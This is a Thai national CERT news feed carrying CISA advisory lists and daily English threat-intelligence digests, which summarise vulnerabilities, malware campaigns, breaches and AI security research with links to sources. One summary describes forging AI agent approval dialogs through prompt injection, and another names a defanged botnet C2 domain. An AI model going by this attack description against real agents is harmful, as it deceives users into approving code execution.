สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand 
โพสต์ถูกสร้างโดย NCSA_THAICERT
-
มัลแวร์ GhostPoster แฝงโค้ดอันตรายในโลโก้ส่วนขยาย Firefox กว่า 17 รายการโพสต์ใน Cyber Security News
-
การโจมตีทางไซเบอร์กระทบ Petróleos de Venezuela (PDVSA) ส่งผลการส่งออกหยุดชะงักชั่วคราวโพสต์ใน Cyber Security News
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
มัลแวร์ Android ชื่อ “Cellik” แฝงตัวในแอปจาก Google Play ขโมยข้อมูลได้ครบวงจรโพสต์ใน Cyber Security News
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
CISA เผยแพร่คำแนะนำด้านระบบควบคุมอุตสาหกรรม (ICS) จำนวน 6 รายการโพสต์ใน OT Cyber Security News
Cybersecurity and Infrastructure Security Agency (CISA) ได้เผยแพร่คำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม (ICS) จำนวน 6 รายการ เมื่อวันที่ 16 ธันวาคม 2025 เพื่อให้ข้อมูลที่ทันเวลาเกี่ยวกับประเด็นด้านความมั่นคงปลอดภัย ช่องโหว่ และการโจมตีที่เกี่ยวข้องกับระบบ ICS โดยมีรายละเอียดดังนี้
- ICSA-25-350-01 Güralp Systems FMUS (Fortimus) Series and MIN (Minimus) Series
- ICSA-25-350-02 Johnson Controls PowerG, IQPanel and IQHub
- ICSA-25-350-03 Hitachi Energy AFS, AFR and AFF Series
- ICSA-25-350-04 Mitsubishi Electric GT Designer3
- ICSA-25-224-02 Johnson Controls iSTAR Ultra, iSTAR Ultra SE, iSTAR Ultra G2, iSTAR Ultra G2 SE, iSTAR Edge G2 (Update A)
- ICSA-25-308-01 Fuji Electric Monitouch V-SFT-6 (Update A)
CISA แนะนำให้ผู้ใช้งานและผู้ดูแลระบบ ตรวจสอบคำแนะนำ ICS ที่เผยแพร่ล่าสุด เพื่อศึกษารายละเอียดทางเทคนิคและแนวทางการลดความเสี่ยง (mitigations)
อ้างอิง
https://www.cisa.gov/news-events/alerts/2025/12/16/cisa-releases-seven-industrial-control-systems-advisories
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
CISA เพิ่มช่องโหว่ที่ถูกใช้โจมตี 3 รายการลงในแคตตาล็อกโพสต์ใน Cyber Security News
เมื่อวันที่ 17 ธันวาคม 2025 Cybersecurity and Infrastructure Security Agency (CISA) ได้เพิ่มช่องโหว่ใหม่ 3 รายการลงในแคตตาล็อก Known Exploited Vulnerabilities (KEV) จากหลักฐานที่พบว่ามีการโจมตีใช้งานจริงแล้ว ดังนี้
- CVE-2025-20393 Cisco Multiple Products Improper Input Validation Vulnerability
- CVE-2025-40602 SonicWall SMA1000 Missing Authorization Vulnerability
- CVE-2025-59374 ASUS Live Update Embedded Malicious Code Vulnerability
ทั้งนี้ คำสั่ง BOD 22-01 ของ CISA กำหนดให้มี แคตตาล็อก Known Exploited Vulnerabilities (KEV) เพื่อรวบรวมช่องโหว่ (CVEs) ที่มีความเสี่ยงสูงและถูกใช้งานโจมตีจริง หน่วยงาน Federal Civilian Executive Branch (FCEB) ต้องดำเนินการแก้ไขช่องโหว่ที่ระบุภายในเวลาที่กำหนด เพื่อปกป้องเครือข่ายจากภัยคุกคาม
ทาง CISA จะปรับปรุงและเพิ่มช่องโหว่ใหม่เข้าสู่แคตตาล็อก KEV อย่างต่อเนื่อง เพื่อให้ครอบคลุมความเสี่ยงที่ตรวจพบจริงในปัจจุบันและอนาคต
อ้างอิง
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
Cyber Threat Intelligence 18 December 2025โพสต์ใน Cyber Security News
Financial Sector
- Banks Built Rules For Yesterday’s Crime And RegTech Is Trying To Fix That
"Criminals are moving money across borders faster, and financial institutions are feeling the squeeze. Compliance teams feel this strain every day as they try to keep up with schemes that shift through accounts, intermediaries, and digital channels. A new academic review of regulatory technology, or RegTech, shows how this pressure is reshaping compliance work and why research in this field is gaining new weight."
https://www.helpnetsecurity.com/2025/12/17/regulatory-technology-financial-crime-study/
New Tooling
- Zabbix: Open-Source IT And OT Observability Solution
"Zabbix is an open source monitoring platform designed to track the availability, performance, and integrity of IT environments. It monitors networks along with servers, virtual machines, applications, services, databases, websites, and cloud resources. For cybersecurity professionals, this visibility matters because operational issues and security incidents often overlap. Early signs of compromise can surface as performance changes, service failures, or unusual system behavior that monitoring tools detect first."
https://www.helpnetsecurity.com/2025/12/17/zabbix-open-source-it-ot-observability-solution/
https://github.com/zabbix/zabbix
Vulnerabilities
- UAT-9686 Actively Targets Cisco Secure Email Gateway And Secure Email And Web Manager
"Cisco Talos is tracking the active targeting of Cisco AsyncOS Software for Cisco Secure Email Gateway, formerly known as Cisco Email Security Appliance (ESA), and Cisco Secure Email and Web Manager, formerly known as Cisco Content Security Management Appliance (SMA), enabling attackers to execute system-level commands and deploy a persistent Python-based backdoor, AquaShell. Cisco became aware of this activity on December 10, which has been ongoing since at least late November 2025. Additional tools observed include AquaTunnel (reverse SSH tunnel), chisel (another tunneling tool), and AquaPurge (log-clearing utility). Talos' analysis indicates that appliances with non-standard configurations, as described in Cisco's advisory, are what we have observed as being compromised by the attack."
https://blog.talosintelligence.com/uat-9686/
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sma-attack-N9bf4
https://www.bleepingcomputer.com/news/security/cisco-warns-of-unpatched-asyncos-zero-day-exploited-in-attacks/
https://www.theregister.com/2025/12/17/attacks_pummeling_cisco_0day/
https://www.helpnetsecurity.com/2025/12/17/cisco-secure-email-cve-2025-20393/ - Critical Arbitrary File Upload Vulnerability In Motors Theme Affecting 20k+ Sites
"This blog post is about a Subscriber+ arbitrary file upload vulnerability in the Motors theme. If you're a Motors theme user, please update to at least version 5.6.82. This vulnerability was discovered and reported by Patchstack Alliance community member Denver Jackson."
https://patchstack.com/articles/critical-arbitrary-file-upload-vulnerability-in-motors-theme-affecting-20k-sites/
https://www.infosecurity-magazine.com/news/motors-wordpress-flaw-takeover/ - Sonicwall Warns Of New SMA1000 Zero-Day Exploited In Attacks
"SonicWall warned customers today to patch a vulnerability in the SonicWall SMA1000 Appliance Management Console (AMC) that was chained in zero-day attacks to escalate privileges. According to SonicWall, this medium-severity local privilege escalation security flaw (CVE-2025-40602) was reported by Clément Lecigne and Zander Work of the Google Threat Intelligence Group, and doesn't affect SSL-VPN running on SonicWall firewalls. "SonicWall PSIRT strongly advises users of the SMA1000 product to upgrade to the latest hotfix release version to address the vulnerability," the company said in a Wednesday advisory."
https://www.bleepingcomputer.com/news/security/sonicwall-warns-of-new-sma1000-zero-day-exploited-in-attacks/
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0019
https://thehackernews.com/2025/12/sonicwall-fixes-actively-exploited-cve.html
https://securityaffairs.com/185809/hacking/sonicwall-warns-of-actively-exploited-flaw-in-sma-100-amc.html
https://www.helpnetsecurity.com/2025/12/17/sonicwall-cve-2025-40602/ - Libbiosig, Grassroot DiCoM, Smallstep Step-Ca Vulnerabilities
"Cisco Talos’ Vulnerability Discovery & Research team recently disclosed vulnerabilities in Biosig Project Libbiosig, Grassroot DiCoM, and Smallstep step-ca. The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy, except for Grassroot, as the DiCoM vulnerabilities are zero-days."
https://blog.talosintelligence.com/libbiosig-grassroot-dicom-smallstep-step-ca-vulnerabilities/ - Defending Against The CVE-2025-55182 (React2Shell) Vulnerability In React Server Components
"CVE-2025-55182 (also referred to as React2Shell and includes CVE-2025-66478, which was merged into it) is a critical pre-authentication remote code execution (RCE) vulnerability affecting React Server Components, Next.js, and related frameworks. With a CVSS score of 10.0, this vulnerability could allow attackers to execute arbitrary code on vulnerable servers through a single malicious HTTP request. Exploitation activity related to this vulnerability was detected as early as December 5, 2025."
https://www.microsoft.com/en-us/security/blog/2025/12/15/defending-against-the-cve-2025-55182-react2shell-vulnerability-in-react-server-components/
https://cyberscoop.com/react2shell-vulnerability-fallout-spreads/ - Turning AI Safeguards Into Weapons With HITL Dialog Forging
"This article provides a deeper technical analysis of the novel agentic AI attack vector: the LITL attack, which we recently developed and documented in Bypassing AI Agent Defenses With Lies-In-The-Loop. The LITL attack directly targets the HITL component, causing the agent to prompt the user with a seemingly benign HITL dialog that can deceive users into approving a remote code execution attack originating from indirect prompt injections."
https://checkmarx.com/zero-post/turning-ai-safeguards-into-weapons-with-hitl-dialog-forging/
https://www.infosecurity-magazine.com/news/lies-loop-attack-ai-safety-dialogs/
Malware
- GhostPairing Attacks: From Phone Number To Full Access In WhatsApp
"Gen has discovered a novel WhatsApp account takeover campaign that we refer to as GhostPairing Attack. On the surface it looks very simple. Victims receive a message from one of their contacts, usually something along the lines of: “Hey, I just found your photo!” The message includes a link that appears as a Facebook style preview. When users open it, they see a page that imitates a Facebook viewer and asks them to “verify” before they can see the content."
https://www.gendigital.com/blog/insights/research/ghostpairing-whatsapp-attack
https://www.bleepingcomputer.com/news/security/whatsapp-device-linking-abused-in-account-hijacking-attacks/ - React2Shell Used As Initial Access Vector For Weaxor Ransomware Deployment
"S-RM has responded to an incident where a threat actor used the recently disclosed critical vulnerability known as React2Shell (CVE-2025-55182) to gain access to a corporate network and deploy ransomware. The deployment of ransomware in S-RM’s cases appears to have been automated, and the scope of compromise remained limited to the server which was vulnerable to React2Shell."
https://www.s-rminform.com/latest-thinking/react2shell-used-as-initial-access-vector-for-weaxor-ransomware-deployment
https://www.bleepingcomputer.com/news/security/critical-react2shell-flaw-exploited-in-ransomware-attacks/ - Windows Persistence Explained: Techniques, Risks, And What Defenders Should Know
"Modern Windows systems include many built-in features that help applications run smoothly and support everyday user activity. Unfortunately, many of these built-in functionalities can be exploited by threat actors in order to have malware payloads remain on a system and run without user interaction. These different features can be abused to be what security researchers call “persistence mechanisms.”"
https://cofense.com/blog/windows-persistence-explained-techniques,-risks,-and-what-defenders-should-know - NuGet Malware Targets Nethereum Tools
"This year, ReversingLabs (RL) researchers have discovered malware on various open-source software (OSS) platforms that target crypto users and developers. This is an attack trend RL saw explode in 2024, and it has continued in 2025 with crypto among threat actors favored prey. This past year alone, RL researchers have identified crypto-focused malware on:"
https://www.reversinglabs.com/blog/nuget-malware-crypto-oauth-tokens
https://hackread.com/nuget-malicious-packages-steal-crypto-ad-data/ - ClickFix: DarkGate
"“ClickFix” is a form of social engineering rather than an autonomous malware. It represents a fast-growing method of initial system compromise, where attackers deceive users into executing harmful commands themselves, typically disguised as routine troubleshooting steps or verification procedures ultimately leading to the unintentional installation of malware."
https://www.pointwild.com/threat-intelligence/clickfix-darkgate
https://hackread.com/clickfix-attack-fake-browser-install-darkgate-malware/ - Inside a Purchase Order PDF Phishing Campaign
"A customer contacted me when Malwarebytes blocked the link inside a “purchase order” email they had received. When I examined the attachment, it soon became clear why we blocked it. The visible content of the PDF showed a button prompting the recipient to view the purchase order. Hovering over the button revealed a long URL that included a reference to a PDF viewer. While this might fool some people at first glance, a closer look raised red flags:"
https://www.malwarebytes.com/blog/threat-intel/2025/12/inside-a-purchase-order-pdf-phishing-campaign - Operation ForumTroll Continues: Russian Political Scientists Targeted Using Plagiarism Reports
"In March 2025, we discovered Operation ForumTroll, a series of sophisticated cyberattacks exploiting the CVE-2025-2783 vulnerability in Google Chrome. We previously detailed the malicious implants used in the operation: the LeetAgent backdoor and the complex spyware Dante, developed by Memento Labs (formerly Hacking Team). However, the attackers behind this operation didn’t stop at their spring campaign and have continued to infect targets within the Russian Federation."
https://securelist.com/operation-forumtroll-new-targeted-campaign/118492/
https://thehackernews.com/2025/12/new-forumtroll-phishing-attacks-target.html - Kimwolf Exposed: The Massive Android Botnet With 1.8 Million Infected Devices
"On October 24, 2025, a trusted partner in the security community provided us with a brand-new botnet sample. The most distinctive feature of this sample was its C2 domain, 14emeliaterracewestroxburyma02132[.]su, which at the time ranked 2nd in the Cloudflare Domain Rankings. A week later, it even surpassed Google to claim the number one spot in Cloudflare's global domain popularity rankings. There is no doubt that this is a hyper-scale botnet. Based on the information output during runtime and its use of the wolfSSL library, we have named it Kimwolf."
https://blog.xlab.qianxin.com/kimwolf-botnet-en/
https://thehackernews.com/2025/12/kimwolf-botnet-hijacks-18-million.html - BlueDelta’s Persistent Campaign Against UKR.NET
"Between June 2024 and April 2025, Recorded Future’s Insikt Group identified a sustained credential-harvesting campaign targeting users of UKR.NET, a widely used Ukrainian webmail and news service. The activity is attributed to the Russian state-sponsored threat group BlueDelta (also known as APT28, Fancy Bear, and Forest Blizzard). This campaign builds on BlueDelta’s earlier operations detailed in the May 2024 Insikt Group report “GRU’s BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns,” which documented GRU-linked credential theft and espionage activity. While this campaign does not reveal specific targets, BlueDelta’s historical focus on credential theft to enable intelligence collection provides strong indicators of likely intent to collect sensitive information from Ukrainian users in support of broader GRU intelligence requirements."
https://www.recordedfuture.com/research/bluedeltas-persistent-campaign-against-ukrnet
https://assets.recordedfuture.com/insikt-report-pdfs/2025/cta-ru-2025-1217.pdf
https://therecord.media/russian-bluedelta-hackers-ran-phishing-ukraine-webmail
https://thehackernews.com/2025/12/apt28-targets-ukrainian-ukr-net-users.html - Exclusive: RSF Uncovers New Spyware From Belarus
"Reporters Without Borders (RSF)’s Digital Security Lab (DSL), working with the Eastern European organisation RESIDENT.NGO, has uncovered a previously unknown spyware tool used by the State Security Committee (KGB) of Belarus to target, among others, journalists and media workers. RSF assesses that this exposure is a serious setback for the KGB’s operations, not least because the software appears to have been in use for several years."
https://rsf.org/en/exclusive-rsf-uncovers-new-spyware-belarus
https://therecord.media/spyware-belarus-journalist-rsf - From Linear To Complex: An Upgrade In RansomHouse Encryption
"RansomHouse is a ransomware-as-a-service (RaaS) operation run by a group that we track as Jolly Scorpius. Recent samples of the associated binaries used in RansomHouse operations reveal a significant upgrade in encryption. This article explores the upgrade of RansomHouse encryption and the potential impact for defenders. Jolly Scorpius uses a double extortion strategy. This strategy combines stealing and encrypting a victim's data with threats to leak the stolen data."
https://unit42.paloaltonetworks.com/ransomhouse-encryption-upgrade/
Breaches/Hacks/Leaks
- Auto Parts Giant LKQ Confirms Oracle EBS Breach
"Automotive parts giant LKQ Corporation has confirmed that it has been impacted by the recent cybercrime campaign targeting customers of the Oracle E-Business Suite (EBS) solution. The Fortune 500 company provides recycled, refurbished, and aftermarket components for cars and other types of vehicles. LKQ was one of the first victims of the Oracle EBS hack named on the Cl0p ransomware website, where the cybercriminals behind the campaign have been listing targeted organizations."
https://www.securityweek.com/auto-parts-giant-lkq-confirms-oracle-ebs-breach/
https://www.infosecurity-magazine.com/news/lkq-confirms-oracle-ebs-breach/ - GNV Ferry Fantastic Under Cyberattack Probe Amid Remote Hijack Fears
"French prosecutors are investigating a suspected cyberattack on the GNV ferry Fantastic, raising fears of a potential remote hijack. The ferry Fantastic sails between Sète and North Africa, and French authorities are investigating a suspected attempt to compromise the ship’s IT systems. Italian intelligence, prompted by GNV, alerted French authorities about two sailors, a Latvian and a Bulgarian, suspected of spying for a foreign power. The Paris prosecutor’s cybercrime unit is investigating an organized attack on automated data systems, allegedly to serve a foreign power."
https://securityaffairs.com/185800/hacking/gnv-ferry-fantastic-under-cyberattack-probe-amid-remote-hijack-fears.html
General News
- November 2025 APT Attack Trends Report (South Korea)
"AhnLab is monitoring APT (Advanced Persistent Threat) attacks in South Korea using our own infrastructure. This report covers the classification and statistics of APT attacks in South Korea that were identified over the course of one month in November 2025. It also provides an overview of the features of each attack type."
https://asec.ahnlab.com/en/91587/ - AI Breaks The Old Security Playbook
"AI has moved into enterprise operations faster than many security programs expected. It is embedded in workflows, physical systems, and core infrastructure. Some AI tools reach hundreds of millions of users each week. Inference costs have fallen 280 fold, but overall spending is still rising because usage keeps growing. Attackers are using the same tools. CISOs manage a broader attack surface driven by automation, new data paths, and machine led decisions. Deloitte’s Tech Trends 2026 shows how this shift is changing what CISOs and other technology leaders are responsible for."
https://www.helpnetsecurity.com/2025/12/17/deloitte-enterprise-ai-defense-report/ - Strengthening Cyber Resilience As AI Capabilities Advance
"Cyber capabilities in AI models are advancing rapidly, bringing meaningful benefits for cyberdefense as well as new dual-use risks that must be managed carefully. For example, capabilities assessed through capture-the-flag (CTF) challenges have improved from 27% on GPT‑5(opens in a new window) in August 2025 to 76% on GPT‑5.1-Codex-Max(opens in a new window) in November 2025."
https://openai.com/index/strengthening-cyber-resilience/
https://blog.barracuda.com/2025/12/16/openai-ai-model-cybersecurity-warning - Zeroday Cloud Hacking Event Awards $320,0000 For 11 Zero Days
"The Zeroday Cloud hacking competition in London has awarded researchers $320,000 for demonstrating critical remote code execution vulnerabilities in components used in cloud infrastructure. The first hacking event focused on cloud systems, the competition is hosted by Wiz Research in partnership with Amazon Web Services, Microsoft, and Google Cloud. The researchers were successful in 85% of the hacking attempts across 13 hacking sessions, demonstrating 11 zero-day vulnerabilities."
https://www.bleepingcomputer.com/news/security/zeroday-cloud-hacking-event-awards-320-0000-for-11-zero-days/ - France Arrests Suspect Tied To Cyberattack On Interior Ministry
"French authorities arrested a 22-year-old suspect on Tuesday for a cyberattack that targeted France's Ministry of the Interior earlier this month. In a statement issued by Public Prosecutor Laure Beccuau, officials said the suspected hacker was arrested on December 17, 2025, as part of an investigation into the attack. "A person was arrested on December 17, 2025, as part of the investigation opened by the cybercrime unit of the Paris public prosecutor's office, on charges including unauthorized access to an automated personal data processing system implemented by the State, committed by an organized group, following the cyberattack against the Ministry of the Interior," reads the statement translated into English."
https://www.bleepingcomputer.com/news/security/france-arrests-suspect-tied-to-cyberattack-on-interior-ministry/
https://therecord.media/france-interior-ministry-email-breach-investigation
https://hackread.com/france-arrests-hacker-interior-ministry-systems/ - 'I Quit!' - When CISOs Need To Take Charge Of Their Careers
"A recent LinkedIn post has been circulating in cybersecurity circles, written as a CISO's resignation letter - "effective immediately." It resonates with security leaders who know the pattern - budget requests denied, risks that are documented and escalated, and a breach that follows a known vulnerability. Then the CISO was hit by inevitable question: "Why didn't you prevent this?""
https://www.bankinfosecurity.com/blogs/i-quit-when-cisos-need-to-take-charge-their-careers-p-4002 - In Cybersecurity, Claude Leaves Other LLMs In The Dust
"New sobering data confirms what many in cybersecurity already know: that while large language models (LLMs) are improving significantly in ways that generate profits for their developers, they're missing the improvements that would keep them safe and secure. In its second Potential Harm Assessment & Risk Evaluation (PHARE) LLM benchmark report, researchers at Giskard tested brand name models from OpenAI, Anthropic, xAI, Meta, Google, and others on their ability to resist jailbreaks, avoid hallucinations and biases, and more. Two things immediately pop out in the data: how little progress is being made across the industry, and how much of it is being carried by Anthropic alone."
https://www.darkreading.com/cybersecurity-analytics/cybersecurity-claude-llms - Why You Should Train Your SOC Like a Triathlete
"Triathletes learn a simple truth early. Fancy gear cannot overcome a junk food diet. The same holds for security operations. AI has become an integral part of daily security operations center work, but its performance is capped by the quality of the evidence it consumes. Thin or noisy inputs slow investigations, increase fatigue, and create doubt."
https://www.darkreading.com/cybersecurity-operations/why-you-should-train-your-soc-like-triathlete - AI Is Reshaping Modern Cybercrime
"Fortinet has been working closely with UC Berkeley’s Center for Long-Term Cybersecurity (CLTC), the Berkeley Risk and Security Lab (BRSL), and public- and private-sector partners, including academia, as part of the AI-Enabled Cybercrime Initiative. This effort uses global tabletop exercises (TTXs), research, and policy analysis to understand how AI is shaping cybercrime and how defenders can stay ahead. As part of this coordinated work, CLTC has published an academic analysis of the Singapore TTX, From Automation to Autonomy: The Next Leap in AI-Enabled Cybercrimes, authored by Dr. Gil Baram, Helena Huang, and me."
https://www.fortinet.com/blog/industry-trends/ai-is-reshaping-modern-cybercrime
https://cltc.berkeley.edu/publication/from-automation-to-autonomy-the-next-leap-in-ai-enabled-cybercrimes/ - Why Vulnerability Reports Stall Inside Shared Hosting Companies
"Security teams keep sending vulnerability notifications, and the same pattern keeps repeating. Many alerts land, few lead to fixes. A new qualitative study digs into what happens after those reports arrive and explains why remediation so often stops short. The research comes from the Center for Information Security Saarbrücken and is based on in depth interviews with 24 hosting provider organizations across shared hosting, VPS services, and web agencies. The researchers focused on how providers receive, process, and act on vulnerability notifications, rather than testing new notification formats or channels."
https://www.helpnetsecurity.com/2025/12/17/hosting-provider-vulnerability-notifications-remediation/ - NMFTA Warns Of Surge And Sophistication Of Cyber-Enabled Cargo Theft
"The National Motor Freight Traffic Association (NMFTA) has issued another warning to the logistics and transportation industry as traditional cargo theft is being rapidly replaced by sophisticated, cyber-enabled heists. CargoNet reported in October that it recorded over 700 cargo thefts in the US and Canada in the third quarter of 2025, with the value of the stolen goods totaling more than $111 million. According to the American Trucking Associations, thieves targeting freight shipments cost the US economy up to $35 billion per year. While in the past thieves would in most cases rob truck drivers at gunpoint or break into trailers, this type of crime has become increasingly sophisticated, mainly driven by criminals’ reliance on hacker tactics."
https://www.securityweek.com/nmfta-warns-of-surge-and-sophistication-of-cyber-enabled-cargo-theft/ - Five Cybersecurity Predictions For 2026: Identity, AI, And The Collapse Of Perimeter Thinking
"Cybersecurity has always evolved in response to attacker innovation, but the pace of change over the last few years has been unprecedented—particularly with the emergence of weaponized AI to scale phishing, deepfakes, and voice cloning. As we head toward 2026, several structural shifts are becoming impossible to ignore. Traditional security assumptions are breaking down, threat actors are scaling faster than defenders, and identity—not infrastructure—has become the primary battleground. Here are five predictions that will shape the cybersecurity landscape in 2026:"
https://www.securityweek.com/five-cybersecurity-predictions-for-2026-identity-ai-and-the-collapse-of-perimeter-thinking/ - FBI Disrupts Virtual Money Laundering Service Used To Facilitate Criminal Activity
"The United States Attorney’s Office for the Eastern District of Michigan announced today a coordinated action with international partners and the Michigan State Police to disrupt and take down the online infrastructure used to operate E-Note, a cryptocurrency exchange that allegedly facilitated money laundering by transnational cyber-criminal organizations, including those targeting U.S. healthcare and critical infrastructure. Since 2017, the FBI identified more than $70,000,000 of illicit proceeds of ransomware attacks and account takeovers transferred via E-Note payment service and money mule network, including laundered funds stolen or extorted from U.S. victims."
https://www.justice.gov/usao-edmi/pr/fbi-disrupts-virtual-money-laundering-service-used-facilitate-criminal-activity
https://therecord.media/fbi-takes-down-alleged-money-laundering-operation - ESET Threat Report H2 2025
"The second half of the year underscored just how quickly attackers adapt and innovate, with rapid changes sweeping across the threat landscape. AI-powered malware moved from theory to reality in H2 2025, as ESET discovered PromptLock, the first known AI-driven ransomware, capable of generating malicious scripts on the fly. While AI is still mainly used for crafting convincing phishing and scam content, PromptLock – and the handful of other AI-driven threats identified to this day – signal a new era of threats."
https://www.welivesecurity.com/en/eset-research/eset-threat-report-h2-2025/
อ้างอิง
Electronic Transactions Development Agency (ETDA)
- Banks Built Rules For Yesterday’s Crime And RegTech Is Trying To Fix That
-
Cyber Threat Intelligence 17 December 2025โพสต์ใน Cyber Security News
Healthcare Sector
- The Messy Data Trails Of Telehealth Are Becoming a Security Nightmare
"In this Help Net Security interview, Scott Bachand, CIO/CISO at Ro, discusses how telehealth reshapes the flow of patient data and what that means for security. He explains why organizations must strengthen data classification and visibility as systems and vendors multiply. He also outlines how regulations and new technologies are driving a more adaptive approach to protecting patient information."
https://www.helpnetsecurity.com/2025/12/16/scott-bachand-ro-telehealth-security/
Vulnerabilities
- JUMPSHOT: XM Cyber Uncovers Critical Local Privilege Escalation (CVE-2025-34352) In JumpCloud Agent
"XM Cyber Researcher Hillel Pinto uncovered CVE-2025-34352, a critical vulnerability in the JumpCloud Remote Assist for Windows agent (versions prior to 0.317.0). The flaw allows any low-privileged local user to exploit insecure file operations—arbitrary file write/delete—performed by the agent running as NT AUTHORITY\SYSTEM within the user’s temporary directory. This vulnerability is immediately exploitable to achieve Local Privilege Escalation (LPE) or cause a Denial of Service (DoS). Users must update immediately to version 0.317.0 or later to patch the issue."
https://xmcyber.com/blog/jumpshot-xm-cyber-uncovers-critical-local-privilege-escalation-cve-2025-34352-in-jumpcloud-agent/
https://www.securityweek.com/jumpcloud-remote-assist-vulnerability-can-expose-systems-to-takeover/
https://www.infosecurity-magazine.com/news/jumpcloud-windows-agent-flaw/
https://hackread.com/jumpcloud-remote-assist-flaw-full-devices-control/ - God Mode On: Researchers Run Doom On a Vehicle’s Head Unit After Remotely Attacking Its Modem
"Imagine you are a driver speeding down the highway in your brand-new electric car. All of a sudden, the entire massive multimedia display is filled with Doom, the iconic 3D shooter game, replacing the navigation map or the controls menu, and you realize someone is playing it right now by remotely controlling the character. This is not a dream or an overactive imagination, but a realistic scenario in today’s world, as vividly demonstrated by Kaspersky ICS CERT experts."
https://ics-cert.kaspersky.com/publications/reports/2025/11/20/god-mode-on-researchers-run-doom-on-a-vehicles-head-unit-after-remotely-attacking-its-modem/
Malware
- Arctic Wolf Observes Malicious SSO Logins On FortiGate Devices Following Disclosure Of CVE-2025-59718 And CVE-2025-59719
"On December 12, 2025, Arctic Wolf began observing intrusions involving malicious SSO logins on FortiGate appliances. Fortinet had previously released an advisory for two critical authentication bypass vulnerabilities (CVE-2025-59718 and CVE-2025-59719) on December 9, 2025. Arctic Wolf had also sent out a security bulletin for the vulnerabilities shortly thereafter. These vulnerabilities allow unauthenticated bypass of SSO login authentication via crafted SAML messages, if the FortiCloud SSO feature is enabled on affected Devices. Several product lines were reported to be affected, including FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager."
https://arcticwolf.com/resources/blog/arctic-wolf-observes-malicious-sso-logins-following-disclosure-cve-2025-59718-cve-2025-59719/
https://www.bleepingcomputer.com/news/security/hackers-exploit-newly-patched-fortinet-auth-bypass-flaws/
https://thehackernews.com/2025/12/fortinet-fortigate-under-active-attack.html
https://www.securityweek.com/in-the-wild-exploitation-of-fresh-fortinet-flaws-begins/
https://securityaffairs.com/185748/security/hackers-are-exploiting-critical-fortinet-flaws-days-after-patch-release.html - Inside GhostPoster: How a PNG Icon Infected 50,000 Firefox Users
"Every extension has a logo. A tiny image sitting in your toolbar, a visual shorthand for trust. You glance at it, you recognize it, you move on. You probably never think about what's actually inside that file. The authors of GhostPoster are counting on that. Our risk engine, Wings, flagged anomalous behavior in a Firefox extension called Free VPN Forever. The extension was reading its own logo file, standard behavior, but then doing something unusual with the raw bytes. When we dug into the code, we found a hidden extraction routine. The extension wasn't just displaying the logo. It was searching through the image data, looking for a marker that shouldn't be there."
https://www.koi.ai/blog/inside-ghostposter-how-a-png-icon-infected-50-000-firefox-browser-users
https://www.bleepingcomputer.com/news/security/ghostposter-attacks-hide-malicious-javascript-in-firefox-addon-logos/ - Meet Cellik - A New Android RAT With Play Store Integration
"Cellik is a newly identified Android RAT that offers full device control and real-time surveillance, with Play Store integration that lets attackers bundle it into legitimate apps. Discovered via cybercrime networks, Cellik comes packed with capabilities previously seen only in advanced spyware: real-time screen streaming, keylogging, remote camera/microphone access, hidden web browsing, notification interception, and even an app-injection system for stealing data from other apps. Uniquely, Cellik integrates with Google Play Store apps and includes a one-click APK builder, allowing attackers to wrap its payload inside legitimate apps for stealthy, widespread deployment."
https://iverify.io/blog/meet-cellik---a-new-android-rat-with-play-store-integration
https://www.bleepingcomputer.com/news/security/cellik-android-malware-builds-malicious-versions-from-google-play-apps/ - Ink Dragon Expands With New Tools And a Growing Victim Network
"Ink Dragon is a long running espionage group that several security vendors allege to be a China-linked threat actor, based on behavioral and infrastructure indicators. Its activity has grown from operations in Southeast Asia and South America to a rising number of intrusions in European government networks. Check Point Research has tracked this expansion through a series of quiet but disciplined campaigns, many of which initially appeared unremarkable until deeper investigation exposed a consistent pattern of stealthy escalation."
https://blog.checkpoint.com/research/ink-dragon-expands-with-new-tools-and-a-growing-victim-network/
https://www.theregister.com/2025/12/16/chinas_ink_dragon_hides_out/ - BlindEagle Targets Colombian Government Agency With Caminho And DCRAT
"In early September 2025, Zscaler ThreatLabz discovered a new spear phishing campaign attributed to BlindEagle, a threat actor who operates in South America and targets users in Spanish-speaking countries, such as Colombia. In this campaign, BlindEagle targeted a government agency under the control of the Ministry of Commerce, Industry and Tourism (MCIT) in Colombia using a phishing email sent from what appears to be a compromised account within the same organization. In this blog post, ThreatLabz explores the attack chain and analyzes the techniques employed, including the use of a fake web portal, nested JavaScript and PowerShell scripts, steganography to conceal malicious payloads, Caminho as a downloader, and DCRAT as the final payload."
https://www.zscaler.com/blogs/security-research/blindeagle-targets-colombian-government-agency-caminho-and-dcrat - GuardDuty Extended Threat Detection Uncovers Cryptomining Campaign On Amazon EC2 And Amazon ECS
"Amazon GuardDuty and our automated security monitoring systems identified an ongoing cryptocurrency (crypto) mining campaign beginning on November 2, 2025. The operation uses compromised AWS Identity and Access Management (IAM) credentials to target Amazon Elastic Container Service (Amazon ECS) and Amazon Elastic Compute Cloud (Amazon EC2). GuardDuty Extended Threat Detection was able to correlate signals across these data sources to raise a critical severity attack sequence finding. Using the massive, advanced threat intelligence capability and existing detection mechanisms of Amazon Web Services (AWS), GuardDuty proactively identified this ongoing campaign and quickly alerted customers to the threat. AWS is sharing relevant findings and mitigation guidance to help customers take appropriate action on this ongoing campaign."
https://aws.amazon.com/blogs/security/cryptomining-campaign-targeting-amazon-ec2-and-amazon-ecs/
https://thehackernews.com/2025/12/compromised-iam-credentials-power-large.html - Malicious NuGet Package Typosquats Popular .NET Tracing Library To Steal Wallet Passwords
